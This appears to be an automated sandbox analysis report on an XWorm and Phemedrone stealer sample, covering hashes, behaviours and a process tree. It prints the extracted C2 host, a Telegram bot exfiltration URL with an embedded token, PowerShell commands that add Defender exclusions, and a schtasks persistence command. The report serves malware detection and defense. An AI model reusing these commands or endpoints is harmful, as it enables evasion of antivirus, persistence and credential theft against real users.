Analysis
-
max time kernel
135s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-09-2024 15:04
Static task
static1
Behavioral task
behavioral1
Sample
35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe
Resource
win10v2004-20240802-en
General
-
Target
35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe
-
Size
291KB
-
MD5
37992d4e5349d0a9275c8d1fe0290591
-
SHA1
2ea1bb73a8459672c7f8a1133c4edc8040c2c63c
-
SHA256
35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6
-
SHA512
dc2bd50f573d806c88eba2f599476d431ad3b2c64cf14e058e6df53edd2383d2a8b18e99aeae14af6fbbdec7f14c4403ced2883cb20a93c77515b1ed5fae7d88
-
SSDEEP
6144:rTiaVHkOlGtyUFB3XjdOwkL1xOJ9NLzof6TUIa1bq/KMw:rXJUFB3zEjLPDf6J
Malware Config
Extracted
xworm
127.0.0.1:19121
goods-flex.gl.at.ply.gg:19121
-
Install_directory
%AppData%
-
install_file
GoogleUpdateUA.exe
Extracted
phemedrone
https://api.telegram.org/bot6766891578:AAE47sIyviQ0_skRFQtvxeYcndg1C8RFyo4/sendDocument
Signatures
-
Detect Xworm Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/2824-14-0x0000000000CE0000-0x0000000000CF6000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\GoogleUpdateUA.exe family_xworm behavioral1/memory/2828-71-0x00000000009B0000-0x00000000009C6000-memory.dmp family_xworm behavioral1/memory/1380-73-0x00000000001C0000-0x00000000001D6000-memory.dmp family_xworm -
Phemedrone
An information and wallet stealer written in C#.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2672 powershell.exe 2560 powershell.exe 1296 powershell.exe 1432 powershell.exe 2472 powershell.exe 1804 powershell.exe 572 powershell.exe -
Drops startup file 2 IoCs
Processes:
GoogleUpdateUA.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleUpdateUA.lnk GoogleUpdateUA.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleUpdateUA.lnk GoogleUpdateUA.exe -
Executes dropped EXE 5 IoCs
Processes:
GoogleUpdateUA.exelauncher.exeSync Center.exeGoogleUpdateUA.exeGoogleUpdateUA.exepid process 2824 GoogleUpdateUA.exe 1476 launcher.exe 2200 Sync Center.exe 2828 GoogleUpdateUA.exe 1380 GoogleUpdateUA.exe -
Loads dropped DLL 2 IoCs
Processes:
35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exepid process 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe 1512 -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exeGoogleUpdateUA.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\launcher.exe" 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateUA = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdateUA.exe" GoogleUpdateUA.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exeSync Center.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2672 powershell.exe 2560 powershell.exe 1296 powershell.exe 2200 Sync Center.exe 1432 powershell.exe 2472 powershell.exe 1804 powershell.exe 572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exepowershell.exeGoogleUpdateUA.exepowershell.exepowershell.exeSync Center.exepowershell.exepowershell.exepowershell.exepowershell.exeGoogleUpdateUA.exeGoogleUpdateUA.exedescription pid process Token: SeDebugPrivilege 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2824 GoogleUpdateUA.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 2200 Sync Center.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeDebugPrivilege 2824 GoogleUpdateUA.exe Token: SeDebugPrivilege 2828 GoogleUpdateUA.exe Token: SeDebugPrivilege 1380 GoogleUpdateUA.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exelauncher.exeSync Center.exeGoogleUpdateUA.exetaskeng.exedescription pid process target process PID 2648 wrote to memory of 2672 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 2648 wrote to memory of 2672 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 2648 wrote to memory of 2672 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 2648 wrote to memory of 2824 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe GoogleUpdateUA.exe PID 2648 wrote to memory of 2824 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe GoogleUpdateUA.exe PID 2648 wrote to memory of 2824 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe GoogleUpdateUA.exe PID 2648 wrote to memory of 2560 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 2648 wrote to memory of 2560 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 2648 wrote to memory of 2560 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 2648 wrote to memory of 1476 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe launcher.exe PID 2648 wrote to memory of 1476 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe launcher.exe PID 2648 wrote to memory of 1476 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe launcher.exe PID 2648 wrote to memory of 1296 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 2648 wrote to memory of 1296 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 2648 wrote to memory of 1296 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe powershell.exe PID 1476 wrote to memory of 2156 1476 launcher.exe cmd.exe PID 1476 wrote to memory of 2156 1476 launcher.exe cmd.exe PID 1476 wrote to memory of 2156 1476 launcher.exe cmd.exe PID 2648 wrote to memory of 2200 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe Sync Center.exe PID 2648 wrote to memory of 2200 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe Sync Center.exe PID 2648 wrote to memory of 2200 2648 35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe Sync Center.exe PID 2200 wrote to memory of 2644 2200 Sync Center.exe WerFault.exe PID 2200 wrote to memory of 2644 2200 Sync Center.exe WerFault.exe PID 2200 wrote to memory of 2644 2200 Sync Center.exe WerFault.exe PID 2824 wrote to memory of 1432 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 1432 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 1432 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 2472 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 2472 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 2472 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 1804 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 1804 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 1804 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 572 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 572 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 572 2824 GoogleUpdateUA.exe powershell.exe PID 2824 wrote to memory of 1324 2824 GoogleUpdateUA.exe schtasks.exe PID 2824 wrote to memory of 1324 2824 GoogleUpdateUA.exe schtasks.exe PID 2824 wrote to memory of 1324 2824 GoogleUpdateUA.exe schtasks.exe PID 2604 wrote to memory of 2828 2604 taskeng.exe GoogleUpdateUA.exe PID 2604 wrote to memory of 2828 2604 taskeng.exe GoogleUpdateUA.exe PID 2604 wrote to memory of 2828 2604 taskeng.exe GoogleUpdateUA.exe PID 2604 wrote to memory of 1380 2604 taskeng.exe GoogleUpdateUA.exe PID 2604 wrote to memory of 1380 2604 taskeng.exe GoogleUpdateUA.exe PID 2604 wrote to memory of 1380 2604 taskeng.exe GoogleUpdateUA.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe"C:\Users\Admin\AppData\Local\Temp\35c96710224c62bd8dbfb9a6f65cd524fb54657d8e75f2bc4268530b004c6dc6.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GoogleUpdateUA.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\GoogleUpdateUA.exe"C:\Users\Admin\AppData\Local\Temp\GoogleUpdateUA.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GoogleUpdateUA.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdateUA.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdateUA.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdateUA.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GoogleUpdateUA" /tr "C:\Users\Admin\AppData\Roaming\GoogleUpdateUA.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1324
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:2156
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2200 -s 5283⤵PID:2644
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0BABF22B-4D16-447E-8445-3CFDB287EBFC} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Roaming\GoogleUpdateUA.exeC:\Users\Admin\AppData\Roaming\GoogleUpdateUA.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Users\Admin\AppData\Roaming\GoogleUpdateUA.exeC:\Users\Admin\AppData\Roaming\GoogleUpdateUA.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63KB
MD59d84713a034176855221121b1b82e66d
SHA11f8b51b489510ba4d7d899b698f0ae1cf24380c3
SHA25643fe14e317713480c623a3fef46f3347c7051796eac95f489db2ea2f5a9830f3
SHA512434a8d9e81fb22ed38ba8c593b7d17be1d8b674b9a0441b194352a7072b7dfc20fdb81bb4aa8451d8b69671ac9f008e3d5611a209894cb1fbc86583a924e84dc
-
Filesize
121KB
MD57b6c19c2c8fc4ff9cc5b136f22cf490d
SHA1e557a697a268c54a73aaffd02d25e54c4f601719
SHA256cf6c9880812d48fe7ba3a1d1a1692a881745a7fb8cf6534f94555dd7dd1c3353
SHA512afe23d16011e1eb71ce3be9f8796cf0398cc9e01415c93cd4e8403f1ee84f48e23396ab7709b60d5a9e5b3e5daee9e8f90bae99e6a85ece6475fa8bdd82f953b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W10DX4KV0QA99E0WYJSZ.temp
Filesize7KB
MD5e952c5c3e819fbb7ba3d1067884cd6d5
SHA1a42a5ab4313cf763ae0d961b6bc9ef391f88a9a2
SHA2569eda51827842d403bbd0315ff61f29a98d5fb5922be2e01c9a603c757dc11109
SHA51267efe9e58b4936e097a2d16b20dc98b9880f310d575eba32ff3367f2aea674d39d6ba8655a394c6f87fe480cc62a66d786ad850c8ca24c27b0888c9f35a4314d
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
251KB
MD5f71fc206efa0533dc5a9bdce59fd342e
SHA1077e3d50d9db91cb943c6dcdfb8913b6b4e8bfda
SHA25698d7a0cf5249443da87cc97998d885ed9811bd0790d49c8ee45577e54296acc6
SHA5122913315fdc26efced8114173761a20c52705778d8fe65a84fc6ca99e8218bf85eabec67a4693dfa9e57596d9e85597aca0d7fafc18b649a2c7b0fa71062daa8e